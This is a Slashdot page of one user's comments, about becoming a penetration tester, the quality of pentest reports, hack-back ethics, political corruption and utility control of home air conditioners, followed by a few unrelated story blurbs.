Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror

Slashdot videos: Now with more Slashdot!

  • View

  • Discuss

  • Share

We've improved Slashdot's video section; now you can view our video interviews, product close-ups and site visits with all the usual Slashdot options to comment, share, etc. No more walled garden! It's a work in progress -- we hope you'll check it out (Learn more about the recent updates).

×

Comment: Re: Tricky question (Score 2) 205

by valdezjuan (#49236519) Attached to: Ask Slashdot - Breaking Into Penetration Testing At 30

Sadly this is too true. A lot of the shops out there don't understand mitigating controls or 'we tweaked a configuration so we aren't vulnerable, despite what the banner says and here's output from us actually using the exploit....see not vulnerable'. That's one of the major issues I have with PCI, it's far to common for the auditors to not understand the context of the controls, let alone how the network is configured. I remember having to argue with an auditor about how umask worked and sudo.

When we evaluate third party companies we request the most recent pentest report (depending on the data being shared) and most of what we get back is simply screenshots from some vuln scanner and clearly it says Apache so it must be vulnerable. I would love for the end customers to be more educated on what the deliverables should be for a pentest.

Comment: Re:NMAP (Score 5, Informative) 205

by valdezjuan (#49236173) Attached to: Ask Slashdot - Breaking Into Penetration Testing At 30

And this is why there are a ton of shitty 'pentesters' out there who seem to mistake running nessus or nmap scripts as a penetration test. No, it's not 'secret' knowledge and can easily be learned if want to spend the time but running metasploit doesn't make you a pentester.

Like defenders, pentesters generally need to find all the vulnerabilities (sadly many customers accept the first one which ends up being a scoping issue) and understand how to mitigate anything that was discovered/exploited. That requires an understanding of protocols, networking, applications, web frameworks, etc.. I have found that the best tend to have the capacity to think maliciously. IMO, that is a critical skill. I have seen far too many people that just don't understand why anyone would want to abuse a protocol, which makes them substandard pentesters.

As for the original question, there are plenty of tools out there that can help you learn. Metasploitable, WebGoat, Kali, SamuraiWTF (disclosure, I am good friends with the lead for that), ZAP, Burp Suite (pro is great and super reasonable). If you have corporate funding, there are some decent trainings out there Offensive Security has their classes (and certs, I have heard mixed results). There is also SANS, which I have been increasing disappointed with but if you want a bunch of knowledge shoved in your head (at a pretty high dollar cost), they tend to do it. Also, some drift more towards network pentesting or application, personally, I think people should be versed in both (leveraging a remote code execution bug in a webserver is great unless you have no clue what to do within the OS).

For cheaper options there are bunch of books that can teach you a ton of 'tips and tricks' around pentesting (web Hackers Handbook 2nd Edition is particularly good). Having a solid background as a sysadmin makes it much easier IMO (my background is similar), since you are most likely familiar with troubleshooting, networking, multiple OS's and what not.

Comment: Somewhat Related (Score 2) 320

by valdezjuan (#40357811) Attached to: Hacked Companies Fight Back With Controversial Steps

Say you work for company, which gets compromised and data is exfiltrated out of the network to a known source (the attacker used scp so the ip address, username and password are left within bash history or some other bash log). You find it within minutes or before the scp is completed. How do people feel about logging into the machine the data is being exfiltrated to and erasing it from the remote server?
Even if the 3rd party box is one they popped and not the attackers true machine, your not damaging the machine, network, etc., you are just removing 'unauthorized data' (granted, it may be a very fine line).

Comment: Perhaps it would have been useful (Score 1) 574

by valdezjuan (#37758308) Attached to: No Tab Relocation Coming For Chrome

We have other venues such as the chromium-discuss mailing list and our feedback forums where it is appropriate to share your opinions. The forums are a place where we are set up to track user feedback and surface the most critical issues to the team without impacting the productivity of us developers who are busy trying to make Chrome work better.

Maybe it would have been useful for pkasting@chromium.org to actual link to the forums (perhaps one specifically for UI/Design issues...) or the mailing list instead of just the slightly snarky comments.

Comment: Re:It's legal for foreign money to be spent lobbyi (Score 2, Interesting) 183

by valdezjuan (#32480506) Attached to: Plotting a Coup In the Internet Age

I think the greater point is that corruption doesn't always look like corruption. Other countries have helped mitigate this problem, but I seriously doubt the public knows about even a fraction of how often this happens on a global scale. Especially given how many countries are not open books when it comes to these sort of things. Not to mention the rampant corruption organized crime helps create. While a bribe is always a bribe, a bride doesn't always look like one.

The companies that offer bribes also need to be punished for doing so. The US enacted the Foreign Corrupt Practices Act (http://www.justice.gov/criminal/fraud/fcpa/) to combat this problem but few companies ever get more than a slap on the wrist and a wink & nod. Both sides need to realize that offering or accepting a bribe is something that can cost them more than just a few dollars (or whatever the currency).

Now for the obligatory wiki link: http://en.wikipedia.org/wiki/Political_corruption
The global costs are quite large.

Comment: Re:Since customers can override the system.... (Score 2, Interesting) 393

by valdezjuan (#31964640) Attached to: Arizona Trialing System That Lets Utility System Control Home A/Cs

Just thinking about this briefly, I can think of at least one concern (though not directly related to privacy). Power companies (at least in the US) have shown that they are unable to secure their infrastructure. So allowing them to 'control' your settings *might* be allowing an attacker to do the same (or worse).

Timmy O'Riley By L. Hadron and the Colliders 62

Posted by ScuttleMonkey
from the shameless-self-promotion dept.
Making music has never been quite this awesome! Using only ThinkGeek products (Bliptronic 5000, Guitar Shirt, Drumkit Shirt, Stylophone, and Otamatone Electronic Instrument) the ultra-geeks over at ThinkGeek have created this ultra-cool cover of The Who's Baba O'Reilly. This also qualifies as a full blown shameless plug since ThinkGeek shares a corporate overlord with Slashdot.
Media

Lack of Manpower May Kill VLC For Mac 398

Posted by timothy
from the vlc-generally-rocks dept.
plasmacutter writes "The Video Lan dev team has recently come forward with a notice that the number of active developers for the project's MacOS X releases has dropped to zero, prompting a halt in the release schedule. There is now a disturbing possibility that support for Mac will be dropped as of 1.1.0. As the most versatile and user-friendly solution for bridging the video compatibility gap between OS X and windows, this will be a terrible loss for the Mac community. There is still hope, however, if the right volunteers come forward."

... though his invention worked superbly -- his theory was a crock of sewage from beginning to end. -- Vernor Vinge, "The Peace War"

Working...